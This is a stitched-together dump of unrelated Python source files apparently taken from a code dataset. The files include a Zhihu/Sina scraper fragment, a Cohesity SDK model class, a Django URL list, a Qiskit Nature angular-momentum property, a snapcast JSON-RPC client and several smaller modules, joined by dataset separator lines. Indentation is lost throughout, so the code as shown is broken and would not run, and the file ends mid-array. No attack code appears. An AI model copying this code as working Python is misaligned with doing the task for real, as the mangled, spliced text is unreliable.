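        # For illustration (hypothetical URL): '.../doc-iabcdefg1234567.shtml' -> returns 'comos-abcdefg1234567'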
matchObj = re.search(r"doc-i(.+?)\.shtml", self.originalURL, re.M | re.I)
return "comos-" + matchObj.group(1)
def getChannel(self):
pattern = re.compile(r"var SINA_TEXT_PAGE_INFO = (.*?);$", re.MULTILINE | re.DOTALL)
script = self.bsObj.find("script", text=pattern).contents[0]
matchObj = re.search(r"channel: '(.*?)',", script, re.M | re.I)
m = matchObj.group(1)
return m
class Zhihu_Strategy(ReptileStrategy):
def __init__(self, URL):
super().__init__(URL)
def get_Content(self):
content = self.bsObj.find("div", {"class": "RichContent-inner"})
content = content.find("span")
        s = str(content) # Convert to a string
        s_replace = s.replace('<br/>', "\n") # Replace '<br/>' with newline characters
title = self.bsObj.find("h1", {"class": "QuestionHeader-title"}).get_text()
file = open(title + ".txt", "a", encoding='utf-8')
file.write("标题: " + title + "\n")
file.write(s_replace + "\n")
file.write("-----------END-------------\n")
file.close()
class LoadMissException(Exception):
"""
    Raised when the comment div loads but contains no comments (cause unknown).
"""
def __init__(self, url):
self.url = url
def __str__(self):
return "加载错误 " + self.url
class RequestMissException(Exception):
"""
    Raised for pages that cannot be handled with the plain Request approach.
"""
def __init__(self, url):
self.url = url
def __str__(self) -> str:
return "Request 解析错误" + self.url
def save(self):
file = open("../Log/requestErrorUrls.txt", "a+")
log = open("../Log/log.txt", "a+")
file.writelines(self.url + "\n")
log.writelines("Request 解析错误" + self.url + " " + time.asctime(time.localtime(time.time())) + "\n")
class ModeException(Exception):
"""
    Raised when the loading mode is invalid.
"""
def __str__(self) -> str:
return "Mode Exception"
| StarcoderdataPython |
4827189 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.entity_proto
import cohesity_management_sdk.models.deploy_v_ms_to_cloud_task_state_proto
import cohesity_management_sdk.models.destroy_clone_app_task_info_proto
import cohesity_management_sdk.models.destroy_cloned_vm_task_info_proto
import cohesity_management_sdk.models.destroy_mount_volumes_task_info_proto
import cohesity_management_sdk.models.error_proto
import cohesity_management_sdk.models.connector_params
import cohesity_management_sdk.models.user_information
class DestroyClonedTaskStateProto(object):
"""Implementation of the 'DestroyClonedTaskStateProto' model.
TODO: type model description here.
Attributes:
clone_task_name (string): The name of the clone task.
datastore_entity (EntityProto): Specifies the attributes and the
latest statistics about an entity.
deploy_vms_to_cloud_task_state (DeployVMsToCloudTaskStateProto): TODO:
type description here.
destroy_clone_app_task_info (DestroyCloneAppTaskInfoProto): Each
available extension is listed below along with the location of the
proto file (relative to magneto/connectors) where it is defined.
DestroyCloneAppTaskInfoProto extension Location Extension
===================================================================
==========
sql::DestroyCloneTaskInfo::sql_destroy_clone_app_task_info
sql/sql.proto 100
oracle::DestroyCloneTaskInfo::oracle_destroy_clone_app_task_info
oracle/oracle.proto 101
ad::DestroyTaskInfo::ad_destroy_app_task_info ad/ad.proto 102
===================================================================
==========
destroy_clone_vm_task_info (DestroyClonedVMTaskInfoProto): Each
available extension is listed below along with the location of the
proto file (relative to magneto/connectors) where it is defined.
DestroyClonedVMTaskInfoProto extension Location
Extension
===================================================================
========== vmware::DestroyClonedTaskInfo::
vmware_destroy_cloned_vm_task_info vmware/vmware.proto
100 hyperv::DestroyClonedTaskInfo::
hyperv_destroy_cloned_vm_task_info hyperv/hyperv.proto
101
===================================================================
==========
destroy_mount_volumes_task_info (DestroyMountVolumesTaskInfoProto):
TODO: type description here.
end_time_usecs (long|int): If the destroy clone task has finished,
this field contains the end time of the task.
error (ErrorProto): TODO: type description here.
folder_entity (EntityProto): Specifies the attributes and the latest
statistics about an entity.
full_view_name (string): The full external view name where cloned
objects are placed.
parent_source_connection_params (ConnectorParams): Message that
encapsulates the various params required to establish a connection
with a particular environment.
parent_task_id (long|int): The id of the task that triggered the
destroy task. This will be used by refresh task to mark the
destroy task as internal sub-task.
perform_clone_task_id (long|int): The unique id of the task that
performed the clone operation.
restore_type (int): The type of the restore/clone operation that is
being destroyed.
scheduled_constituent_id (long|int): Constituent id (and the gandalf
session id) where this task has been scheduled. If -1, the task is
not running at any slave. It's possible that the task was
previously scheduled, but is now being re-scheduled.
scheduled_gandalf_session_id (long|int): TODO: type description here.
start_time_usecs (long|int): The start time of this destroy clone
task.
status (int): Status of the destroy clone task.
task_id (long|int): A globally unique id of this destroy clone task.
mtype (int): The type of environment that is being operated on.
user (string): The user who requested this destroy clone task.
user_info (UserInformation): A message to encapsulate information
about the user who made the request. Request should be filtered by
these fields if specified so that only the objects that the user
is permissioned for are returned. If both sid_vec & tenant_id are
specified then an intersection of respective results should be
returned.
view_box_id (long|int): The view box id to which 'view_name' belongs
to.
view_name_deprecated (string): The view name as provided by the user
for the clone operation.
"""
# Create a mapping from Model property names to API property names
_names = {
"clone_task_name":'cloneTaskName',
"datastore_entity":'datastoreEntity',
"deploy_vms_to_cloud_task_state":'deployVmsToCloudTaskState',
"destroy_clone_app_task_info":'destroyCloneAppTaskInfo',
"destroy_clone_vm_task_info":'destroyCloneVmTaskInfo',
"destroy_mount_volumes_task_info":'destroyMountVolumesTaskInfo',
"end_time_usecs":'endTimeUsecs',
"error":'error',
"folder_entity":'folderEntity',
"full_view_name":'fullViewName',
"parent_source_connection_params":'parentSourceConnectionParams',
"parent_task_id":'parentTaskId',
"perform_clone_task_id":'performCloneTaskId',
"restore_type":'restoreType',
"scheduled_constituent_id":'scheduledConstituentId',
"scheduled_gandalf_session_id":'scheduledGandalfSessionId',
"start_time_usecs":'startTimeUsecs',
"status":'status',
"task_id":'taskId',
"mtype":'type',
"user":'user',
"user_info":'userInfo',
"view_box_id":'viewBoxId',
"view_name_deprecated":'viewName_DEPRECATED'
}
def __init__(self,
clone_task_name=None,
datastore_entity=None,
deploy_vms_to_cloud_task_state=None,
destroy_clone_app_task_info=None,
destroy_clone_vm_task_info=None,
destroy_mount_volumes_task_info=None,
end_time_usecs=None,
error=None,
folder_entity=None,
full_view_name=None,
parent_source_connection_params=None,
parent_task_id=None,
perform_clone_task_id=None,
restore_type=None,
scheduled_constituent_id=None,
scheduled_gandalf_session_id=None,
start_time_usecs=None,
status=None,
task_id=None,
mtype=None,
user=None,
user_info=None,
view_box_id=None,
view_name_deprecated=None):
"""Constructor for the DestroyClonedTaskStateProto class"""
# Initialize members of the class
self.clone_task_name = clone_task_name
self.datastore_entity = datastore_entity
self.deploy_vms_to_cloud_task_state = deploy_vms_to_cloud_task_state
self.destroy_clone_app_task_info = destroy_clone_app_task_info
self.destroy_clone_vm_task_info = destroy_clone_vm_task_info
self.destroy_mount_volumes_task_info = destroy_mount_volumes_task_info
self.end_time_usecs = end_time_usecs
self.error = error
self.folder_entity = folder_entity
self.full_view_name = full_view_name
self.parent_source_connection_params = parent_source_connection_params
self.parent_task_id = parent_task_id
self.perform_clone_task_id = perform_clone_task_id
self.restore_type = restore_type
self.scheduled_constituent_id = scheduled_constituent_id
self.scheduled_gandalf_session_id = scheduled_gandalf_session_id
self.start_time_usecs = start_time_usecs
self.status = status
self.task_id = task_id
self.mtype = mtype
self.user = user
self.user_info = user_info
self.view_box_id = view_box_id
self.view_name_deprecated = view_name_deprecated
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
clone_task_name = dictionary.get('cloneTaskName')
datastore_entity = cohesity_management_sdk.models.entity_proto.EntityProto.from_dictionary(dictionary.get('datastoreEntity')) if dictionary.get('datastoreEntity') else None
deploy_vms_to_cloud_task_state = cohesity_management_sdk.models.deploy_v_ms_to_cloud_task_state_proto.DeployVMsToCloudTaskStateProto.from_dictionary(dictionary.get('deployVmsToCloudTaskState')) if dictionary.get('deployVmsToCloudTaskState') else None
destroy_clone_app_task_info = cohesity_management_sdk.models.destroy_clone_app_task_info_proto.DestroyCloneAppTaskInfoProto.from_dictionary(dictionary.get('destroyCloneAppTaskInfo')) if dictionary.get('destroyCloneAppTaskInfo') else None
destroy_clone_vm_task_info = cohesity_management_sdk.models.destroy_cloned_vm_task_info_proto.DestroyClonedVMTaskInfoProto.from_dictionary(dictionary.get('destroyCloneVmTaskInfo')) if dictionary.get('destroyCloneVmTaskInfo') else None
destroy_mount_volumes_task_info = cohesity_management_sdk.models.destroy_mount_volumes_task_info_proto.DestroyMountVolumesTaskInfoProto.from_dictionary(dictionary.get('destroyMountVolumesTaskInfo')) if dictionary.get('destroyMountVolumesTaskInfo') else None
end_time_usecs = dictionary.get('endTimeUsecs')
error = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('error')) if dictionary.get('error') else None
folder_entity = cohesity_management_sdk.models.entity_proto.EntityProto.from_dictionary(dictionary.get('folderEntity')) if dictionary.get('folderEntity') else None
full_view_name = dictionary.get('fullViewName')
parent_source_connection_params = cohesity_management_sdk.models.connector_params.ConnectorParams.from_dictionary(dictionary.get('parentSourceConnectionParams')) if dictionary.get('parentSourceConnectionParams') else None
parent_task_id = dictionary.get('parentTaskId')
perform_clone_task_id = dictionary.get('performCloneTaskId')
restore_type = dictionary.get('restoreType')
scheduled_constituent_id = dictionary.get('scheduledConstituentId')
scheduled_gandalf_session_id = dictionary.get('scheduledGandalfSessionId')
start_time_usecs = dictionary.get('startTimeUsecs')
status = dictionary.get('status')
task_id = dictionary.get('taskId')
mtype = dictionary.get('type')
user = dictionary.get('user')
user_info = cohesity_management_sdk.models.user_information.UserInformation.from_dictionary(dictionary.get('userInfo')) if dictionary.get('userInfo') else None
view_box_id = dictionary.get('viewBoxId')
view_name_deprecated = dictionary.get('viewName_DEPRECATED')
# Return an object of this model
return cls(clone_task_name,
datastore_entity,
deploy_vms_to_cloud_task_state,
destroy_clone_app_task_info,
destroy_clone_vm_task_info,
destroy_mount_volumes_task_info,
end_time_usecs,
error,
folder_entity,
full_view_name,
parent_source_connection_params,
parent_task_id,
perform_clone_task_id,
restore_type,
scheduled_constituent_id,
scheduled_gandalf_session_id,
start_time_usecs,
status,
task_id,
mtype,
user,
user_info,
view_box_id,
view_name_deprecated)
| StarcoderdataPython |
1704984 | <gh_stars>0
from solicitudes.views import *
from django.contrib.auth import views
from django.urls import path
urlpatterns = [
path('', solicitudes_request, name='solicitudes'),
path('crear_solicitud', crear_solicitud, name='crear_solicitud'),
] | StarcoderdataPython |
1756129 | <filename>qiskit_nature/properties/second_quantization/electronic/angular_momentum.py<gh_stars>1-10
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The AngularMomentum property."""
import logging
from typing import cast, List, Optional, Tuple
import itertools
import numpy as np
from qiskit_nature.drivers import QMolecule
from qiskit_nature.operators.second_quantization import FermionicOp
from qiskit_nature.results import EigenstateResult
from ..second_quantized_property import LegacyDriverResult
from .bases import ElectronicBasis
from .integrals import (
OneBodyElectronicIntegrals,
TwoBodyElectronicIntegrals,
)
from .types import ElectronicProperty
LOGGER = logging.getLogger(__name__)
class AngularMomentum(ElectronicProperty):
"""The AngularMomentum property."""
ABSOLUTE_TOLERANCE = 1e-05
RELATIVE_TOLERANCE = 1e-02
def __init__(
self,
num_spin_orbitals: int,
spin: Optional[float] = None,
absolute_tolerance: float = ABSOLUTE_TOLERANCE,
relative_tolerance: float = RELATIVE_TOLERANCE,
) -> None:
"""
Args:
num_spin_orbitals: the number of spin orbitals in the system.
spin: the expected spin of the system. This is only used during result interpretation.
If the measured value does not match this one, this will be logged on the INFO level.
absolute_tolerance: the absolute tolerance used for checking whether the measured
particle number matches the expected one.
relative_tolerance: the relative tolerance used for checking whether the measured
particle number matches the expected one.
"""
super().__init__(self.__class__.__name__)
self._num_spin_orbitals = num_spin_orbitals
self._spin = spin
self._absolute_tolerance = absolute_tolerance
self._relative_tolerance = relative_tolerance
@property
def spin(self) -> Optional[float]:
"""Returns the expected spin."""
return self._spin
@spin.setter
def spin(self, spin: Optional[float]) -> None:
"""Sets the expected spin."""
self._spin = spin
def __str__(self) -> str:
string = [super().__str__() + ":"]
string += [f"\t{self._num_spin_orbitals} SOs"]
if self.spin is not None:
string += [f"\tExpected spin: {self.spin}"]
return "\n".join(string)
@classmethod
def from_legacy_driver_result(cls, result: LegacyDriverResult) -> "AngularMomentum":
"""Construct an AngularMomentum instance from a :class:`~qiskit_nature.drivers.QMolecule`.
Args:
result: the driver result from which to extract the raw data. For this property, a
:class:`~qiskit_nature.drivers.QMolecule` is required!
Returns:
An instance of this property.
Raises:
QiskitNatureError: if a :class:`~qiskit_nature.drivers.WatsonHamiltonian` is provided.
"""
cls._validate_input_type(result, QMolecule)
qmol = cast(QMolecule, result)
return cls(
qmol.num_molecular_orbitals * 2,
)
def second_q_ops(self) -> List[FermionicOp]:
"""Returns a list containing the angular momentum operator."""
x_h1, x_h2 = _calc_s_x_squared_ints(self._num_spin_orbitals)
y_h1, y_h2 = _calc_s_y_squared_ints(self._num_spin_orbitals)
z_h1, z_h2 = _calc_s_z_squared_ints(self._num_spin_orbitals)
h_1 = x_h1 + y_h1 + z_h1
h_2 = x_h2 + y_h2 + z_h2
h1_ints = OneBodyElectronicIntegrals(ElectronicBasis.SO, h_1)
h2_ints = TwoBodyElectronicIntegrals(ElectronicBasis.SO, h_2)
return [(h1_ints.to_second_q_op() + h2_ints.to_second_q_op()).reduce()]
# TODO: refactor after closing https://github.com/Qiskit/qiskit-terra/issues/6772
def interpret(self, result: EigenstateResult) -> None:
"""Interprets an :class:`~qiskit_nature.results.EigenstateResult` in this property's context.
Args:
result: the result to add meaning to.
"""
expected = self.spin
result.total_angular_momentum = []
if not isinstance(result.aux_operator_eigenvalues, list):
aux_operator_eigenvalues = [result.aux_operator_eigenvalues]
else:
aux_operator_eigenvalues = result.aux_operator_eigenvalues # type: ignore
for aux_op_eigenvalues in aux_operator_eigenvalues:
if aux_op_eigenvalues is None:
continue
if aux_op_eigenvalues[1] is not None:
total_angular_momentum = aux_op_eigenvalues[1][0].real # type: ignore
result.total_angular_momentum.append(total_angular_momentum)
if expected is not None:
spin = (-1.0 + np.sqrt(1 + 4 * total_angular_momentum)) / 2
if not np.isclose(
spin,
expected,
rtol=self._relative_tolerance,
atol=self._absolute_tolerance,
):
LOGGER.info(
"The measured spin %s does NOT match the expected spin %s!",
spin,
expected,
)
else:
result.total_angular_momentum.append(None)
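# Illustrative usage sketch (the 4-spin-orbital system below is hypothetical, not from this file):
#     total_s_squared_op = AngularMomentum(num_spin_orbitals=4, spin=0.0).second_q_ops()[0]
# second_q_ops() returns a single-element list holding the S^2 FermionicOp assembled from the
# one- and two-body integrals produced by the _calc_s_*_squared_ints helpers below.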
def _calc_s_x_squared_ints(num_modes: int) -> Tuple[np.ndarray, np.ndarray]:
return _calc_squared_ints(num_modes, _modify_s_x_squared_ints_neq, _modify_s_x_squared_ints_eq)
def _calc_s_y_squared_ints(num_modes: int) -> Tuple[np.ndarray, np.ndarray]:
return _calc_squared_ints(num_modes, _modify_s_y_squared_ints_neq, _modify_s_y_squared_ints_eq)
def _calc_s_z_squared_ints(num_modes: int) -> Tuple[np.ndarray, np.ndarray]:
return _calc_squared_ints(num_modes, _modify_s_z_squared_ints_neq, _modify_s_z_squared_ints_eq)
def _calc_squared_ints(num_modes: int, func_neq, func_eq) -> Tuple[np.ndarray, np.ndarray]:
# calculates 1- and 2-body integrals for a given angular momentum axis (x or y or z,
# specified by func_neq and func_eq)
num_modes_2 = num_modes // 2
h_1 = np.zeros((num_modes, num_modes))
h_2 = np.zeros((num_modes, num_modes, num_modes, num_modes))
# pylint: disable=invalid-name
for p, q in itertools.product(range(num_modes_2), repeat=2):
if p != q:
h_2 = func_neq(h_2, p, q, num_modes_2)
else:
h_2 = func_eq(h_2, p, num_modes_2)
h_1[p, p] += 1.0
h_1[p + num_modes_2, p + num_modes_2] += 1.0
h_1 *= 0.25
h_2 *= 0.25
return h_1, h_2
def _modify_s_x_squared_ints_neq(
h_2: np.ndarray, p_ind: int, q_ind: int, num_modes_2: int
) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, q_ind, q_ind + num_modes_2),
(p_ind + num_modes_2, p_ind, q_ind, q_ind + num_modes_2),
(p_ind, p_ind + num_modes_2, q_ind + num_modes_2, q_ind),
(p_ind + num_modes_2, p_ind, q_ind + num_modes_2, q_ind),
]
values = [1, 1, 1, 1]
# adds provided values to values of 2-body integrals (x axis of angular momentum) at given
# indices in case p not equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_x_squared_ints_eq(h_2: np.ndarray, p_ind: int, num_modes_2: int) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, p_ind, p_ind + num_modes_2),
(p_ind + num_modes_2, p_ind, p_ind + num_modes_2, p_ind),
(p_ind, p_ind, p_ind + num_modes_2, p_ind + num_modes_2),
(p_ind + num_modes_2, p_ind + num_modes_2, p_ind, p_ind),
]
values = [-1, -1, -1, -1]
# adds provided values to values of 2-body integrals (x axis of angular momentum) at given
# indices in case p equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_y_squared_ints_neq(
h_2: np.ndarray, p_ind: int, q_ind: int, num_modes_2: int
) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, q_ind, q_ind + num_modes_2),
(p_ind + num_modes_2, p_ind, q_ind, q_ind + num_modes_2),
(p_ind, p_ind + num_modes_2, q_ind + num_modes_2, q_ind),
(p_ind + num_modes_2, p_ind, q_ind + num_modes_2, q_ind),
]
values = [-1, 1, 1, -1]
# adds provided values to values of 2-body integrals (y axis of angular momentum) at given
# indices in case p not equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_y_squared_ints_eq(h_2: np.ndarray, p_ind: int, num_modes_2: int) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, p_ind, p_ind + num_modes_2),
(p_ind + num_modes_2, p_ind, p_ind + num_modes_2, p_ind),
(p_ind, p_ind, p_ind + num_modes_2, p_ind + num_modes_2),
(p_ind + num_modes_2, p_ind + num_modes_2, p_ind, p_ind),
]
values = [1, 1, -1, -1]
# adds provided values to values of 2-body integrals (y axis of angular momentum) at given
# indices in case p equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_z_squared_ints_neq(
h_2: np.ndarray, p_ind: int, q_ind: int, num_modes_2: int
) -> np.ndarray:
indices = [
(p_ind, p_ind, q_ind, q_ind),
(p_ind + num_modes_2, p_ind + num_modes_2, q_ind, q_ind),
(p_ind, p_ind, q_ind + num_modes_2, q_ind + num_modes_2),
(
p_ind + num_modes_2,
p_ind + num_modes_2,
q_ind + num_modes_2,
q_ind + num_modes_2,
),
]
values = [1, -1, -1, 1]
# adds provided values to values of 2-body integrals (z axis of angular momentum) at given
# indices in case p not equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _modify_s_z_squared_ints_eq(h_2: np.ndarray, p_ind: int, num_modes_2: int) -> np.ndarray:
indices = [
(p_ind, p_ind + num_modes_2, p_ind + num_modes_2, p_ind),
(p_ind + num_modes_2, p_ind, p_ind, p_ind + num_modes_2),
]
values = [1, 1]
# adds provided values to values of 2-body integrals (z axis of angular momentum) at given
# indices in case p equal to q
return _add_values_to_s_squared_ints(h_2, indices, values)
def _add_values_to_s_squared_ints(
h_2: np.ndarray, indices: List[Tuple[int, int, int, int]], values: List[int]
) -> np.ndarray:
for index, value in zip(indices, values):
h_2[index] += value
return h_2
| StarcoderdataPython |
1779362 | ########################################################################
# $Header: /var/local/cvsroot/4Suite/Ft/Xml/XPath/ParsedRelativeLocationPath.py,v 1.4 2005/02/09 11:10:54 mbrown Exp $
"""
A parsed token that represents a relative location path in the parsed result tree.
Copyright 2005 Fourthought, Inc. (USA).
Detailed license and copyright information: http://4suite.org/COPYRIGHT
Project home, documentation, distributions: http://4suite.org/
"""
class ParsedRelativeLocationPath:
def __init__(self, left, right):
self._left = left
self._right = right
return
def evaluate(self, context):
nodeset = self._left.select(context)
state = context.copy()
result = []
size = len(nodeset)
for pos in xrange(size):
context.node, context.position, context.size = \
nodeset[pos], pos + 1, size
result.extend(self._right.select(context))
context.set(state)
return result
select = evaluate
def pprint(self, indent=''):
print indent + str(self)
self._left.pprint(indent + ' ')
self._right.pprint(indent + ' ')
def __str__(self):
return '<RelativeLocationPath at %x: %s>' % (
id(self),
repr(self),
)
def __repr__(self):
return repr(self._left) + '/' + repr(self._right)
| StarcoderdataPython |
4813689 | from __future__ import (absolute_import, division, print_function,
with_statement, unicode_literals)
import socket, select, json
import threading
from operator import itemgetter
CLIENT_CONNECT_CHANGES = [
"Client.OnConnect",
"Client.OnDisconnect",
]
CLIENT_VOLUME_CHANGES = [
"Client.OnVolumeChanged",
]
CLIENT_CHANGES = [
"Client.OnLatencyChanged",
"Client.OnNameChanged",
]
GROUP_CHANGES = [
"Group.OnMutet",
"Group.OnStreamChanged",
]
SERVER_CHANGES = [
"Server.OnUpdate",
]
def distribute_volume(clients, sum_to_distribute):
""" Helper function to distribute volume changes to clients.
sum_to_distribute may be positive or negative """
client_count = len(clients)
client_sum = sum([client['old_volume'] for client in clients])
clients.sort(key = itemgetter('old_volume'), reverse=(True if sum_to_distribute > 0 else False) )
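    # Give each client a share of the change proportional to its current volume,
    # clamping the result to [0, 100] and rolling any clipped remainder over to
    # the clients that have not been processed yet.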
for client in clients:
if client_sum == 0:
value = sum_to_distribute // client_count
else:
value = sum_to_distribute * client['old_volume'] // client_sum
if client['old_volume'] + value >= 100:
sum_to_distribute += client['old_volume'] - 100
client['new_volume'] = 100
elif client['old_volume'] + value <= 0:
sum_to_distribute += client['old_volume']
client['new_volume'] = 0
else:
sum_to_distribute -= value
client['new_volume'] = client['old_volume'] + value
client_count -= 1
client_sum -= client['old_volume']
class snapcast(object):
def __init__(self, host, port, message_handler=None):
# connect to remote host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((host, port))
self.message_handler = message_handler
self.socket = s
self.msgid = 1
self.message = {}
self.gotmessage = threading.Event()
thread = threading.Thread(target=self.getmessage)
thread.setDaemon(True)
thread.start()
self.server = self.sendmessage('Server.GetStatus')['server']
def stop(self):
self.socket.close()
def sendmessage(self, method, params=None):
msg = { "id":self.msgid,"jsonrpc":"2.0","method": method }
if params:
msg['params'] = params
socketmsg = json.dumps(msg) + "\r\n"
select.select([],[self.socket],[])
self.socket.send(socketmsg)
self.gotmessage.wait()
self.msgid += 1
return self.message['result']
def getmessage(self):
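        # Reader thread: reassemble newline-terminated JSON-RPC messages from the
        # socket; a response matching the pending request id wakes sendmessage()
        # via the gotmessage event, while notifications go to handle_message().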
while True:
self.gotmessage.clear()
select.select([self.socket],[],[])
data = ''
while len(data) == 0 or data[-1] != "\n":
data += self.socket.recv(1)
try:
my_data = json.loads(data)
except ValueError:
raise ValueError(data)
if 'id' in my_data:
if my_data['id'] == self.msgid:
self.message = my_data
self.gotmessage.set()
else:
raise ValueError(my_data)
else:
self.handle_message(**my_data)
def handle_message(self, method, jsonrpc, params):
if method in CLIENT_VOLUME_CHANGES:
client = self._GetClient(params['id'])
if client:
client['config']['volume'].update(params['volume'])
elif method in CLIENT_CONNECT_CHANGES:
client = self._GetClient(params['id'])
if client:
client['config'].update(params['client'])
elif method in CLIENT_CHANGES:
client = self._GetClient(params['id'])
if client:
client.update(params)
elif method in GROUP_CHANGES:
group = self._GetGroup(params['id'])
if group:
group.update(params)
else:
self.server['groups'].append(params)
elif method in SERVER_CHANGES:
self.server = params['server']
if self.message_handler:
self.message_handler(method, jsonrpc, params)
def _GetClient(self, client_id):
for group in self.server['groups']:
for client in group['clients']:
if client['id'] == client_id:
return client
def _SetClientVolume(self, client_id, key, value):
client = self._GetClient(client_id)
if client['config']['volume'][key] == value:
return True
else:
client['config']['volume'][key] = value
return self.sendmessage('Client.SetVolume', {'id': client_id, 'volume': {key : value}})
def MuteClient(self, client_id):
return self._SetClientVolume(client_id, 'muted', True)
def UnmuteClient(self, client_id):
return self._SetClientVolume(client_id, 'muted', False)
def SetClientVolume(self, client_id, volume):
return self._SetClientVolume(client_id, 'percent', volume)
def _GetGroup(self, group_id):
for group in self.server['groups']:
if group['id'] == group_id:
return group
def GetGroupMute(self, group_id):
mygroup = self._GetGroup(group_id)
return mygroup['muted']
def _MuteGroup(self, group_id, value):
mygroup = self._GetGroup(group_id)
if mygroup['mute'] == value:
return True
else:
mygroup['mute'] = value
return self.sendmessage('Group.SetMute', {'id': group_id, 'mute': value})
def MuteGroup(self, group_id):
return self._MuteGroup(group_id, True)
def UnmuteGroup(self, group_id):
return self._MuteGroup(group_id, False)
def GroupFromPath(self, path):
for stream in self.server['streams']:
if stream['uri']['path'] == path :
for group in self.server['groups']:
if group['stream_id'] == stream['id']:
return group['id']
def ActiveClientsFromGroup(self, GroupID):
group = self._GetGroup(GroupID)
ClientIDs = []
for client in group['clients']:
if client['connected'] and not client['config']['volume']['muted']:
                    ClientIDs.append(client['id'])
        return ClientIDs
def MuteClientsInGroup(self, GroupID):
for ClientID in self.ActiveClientsFromGroup(GroupID):
self.MuteClient(ClientID)
def ExclusiveClientInGroup(self, my_client, GroupID):
self.UnmuteGroup(GroupID)
ActiveClients = self.ActiveClientsFromGroup(GroupID)
if ActiveClients:
for client in ActiveClients:
if client != my_client:
self.MuteClient(client)
self.UnmuteClient(my_client)
def GetGroupVolume(self, GroupID):
group = self._GetGroup(GroupID)
volume_sum = 0
num_clients = 0
for client in group['clients']:
if client['connected'] and not client['config']['volume']['muted']:
volume_sum += client['config']['volume']['percent']
num_clients += 1
if num_clients > 0:
return int(volume_sum / num_clients)
else:
return 0
def SetGroupVolume(self, GroupID, volume):
group = self._GetGroup(GroupID)
clients = []
sum_to_distribute = 0
for client in group['clients']:
if client['connected'] and not client['config']['volume']['muted']:
old_volume = client['config']['volume']['percent']
clients.append({'old_volume': old_volume,
'id': client['id']})
sum_to_distribute += volume - old_volume
if clients:
distribute_volume(clients, sum_to_distribute)
for client in clients:
if client['new_volume'] != client['old_volume']:
self.SetClientVolume(client['id'], client['new_volume'])
return True
else:
return False
| StarcoderdataPython |
60015 | <reponame>rblack42/TikzBuilder
__all__ = ['TikzBuilder']
| StarcoderdataPython |
1781779 | <reponame>FrankDuan/df_code
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import timeutils
SEND_ALL_TOPIC = b'D'
class DbUpdate(object):
"""Encapsulates a DB update
An instance of this object carries the information necessary to prioritize
and process a request to update a DB entry.
Lower value is higher priority !
"""
def __init__(self, table, key, action, value, priority=5,
timestamp=None, topic=SEND_ALL_TOPIC):
self.priority = priority
self.timestamp = timestamp
if not timestamp:
self.timestamp = timeutils.utcnow()
self.key = key
self.action = action
self.table = table
self.value = value
self.topic = topic
def to_dict(self):
update = {
'table': self.table,
'key': self.key,
'action': self.action,
'value': self.value,
'topic': self.topic
}
return update
def __str__(self):
return "Action:%s, Table:%s, Key:%s Value:%s Topic:%s" % (
self.action,
self.table,
self.key,
self.value,
self.topic,
)
def __lt__(self, other):
"""Implements priority among updates
Lower numerical priority always gets precedence. When comparing two
updates of the same priority then the one with the earlier timestamp
        gets precedence. In the unlikely event that the timestamps are also
        equal, it falls back to a simple comparison of keys, so the
        precedence is essentially arbitrary.
"""
if self.priority != other.priority:
return self.priority < other.priority
if self.timestamp != other.timestamp:
return self.timestamp < other.timestamp
return self.key < other.key
| StarcoderdataPython |
3228261 | from pathlib import Path
from fhir.resources.valueset import ValueSet as _ValueSet
from oops_fhir.utils import ValueSet
from oops_fhir.r4.code_system.v3_query_parameter_value import (
v3QueryParameterValue as v3QueryParameterValue_,
)
__all__ = ["v3QueryParameterValue"]
_resource = _ValueSet.parse_file(Path(__file__).with_suffix(".json"))
class v3QueryParameterValue(v3QueryParameterValue_):
"""
v3 Code System QueryParameterValue
The domain of coded values used as parameters within QueryByParameter
queries.
Status: active - Version: 2018-08-12
http://terminology.hl7.org/ValueSet/v3-QueryParameterValue
"""
class Meta:
resource = _resource
| StarcoderdataPython |
1733907 | from numpy import array, all, ones_like
from pynucastro.nucdata import PartitionFunctionTable, PartitionFunctionCollection
import os
nucdata_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
pf_dir = os.path.join(nucdata_dir, 'PartitionFunction')
dir_etfsiq_low = os.path.join(pf_dir, 'etfsiq_low.txt')
dir_frdm_low = os.path.join(pf_dir, 'frdm_low.txt')
dir_etfsiq_high = os.path.join(pf_dir, 'etfsiq_high.txt')
dir_frdm_high = os.path.join(pf_dir, 'frdm_high.txt')
ANSWER_ETFSIQ_LOW = array([1.000271, 1.002656, 1.009124, 1.035543, 1.076750, 1.128518, 1.187847, 1.252797,
1.322103, 1.394926, 1.470693, 1.883077, 2.339548, 2.835353, 3.371056, 3.949365,
4.574281, 5.250894, 5.985411, 7.659520, 9.675912, 12.147961, 15.237089, 19.172457])
ANSWER_FRDM_LOW = array([1.000157, 1.001534, 1.005265, 1.020486, 1.044185, 1.073899, 1.107886, 1.145013,
